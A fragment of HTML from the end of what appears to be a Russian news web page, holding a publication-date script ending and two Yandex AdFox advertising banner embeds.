      article_publication_date: "Thu, 01 Nov 2018 08:06:21 GMT"});</script>
    </div></div></div></div></div><div id='adfox_15084234614097607'></div>
<script>window.Ya.adfoxCode.create({
ownerId: 249448,containerId: 'adfox_15084234614097607',
params: {pp: 'h',ps: 'cnac',p2: 'frbz'}});</script><!--Тип баннера: article_region-->
<!--Расположение: <середина страницы>-->
<div id='adfox_150850929537028801'></div>
<script>window.Ya.adfoxCode.create({ownerId: 249448,
containerId: 'adfox_150850929537028801',params: {
pp: 'h',ps: 'cnac',p2: 'fspr'}});</script></body></html>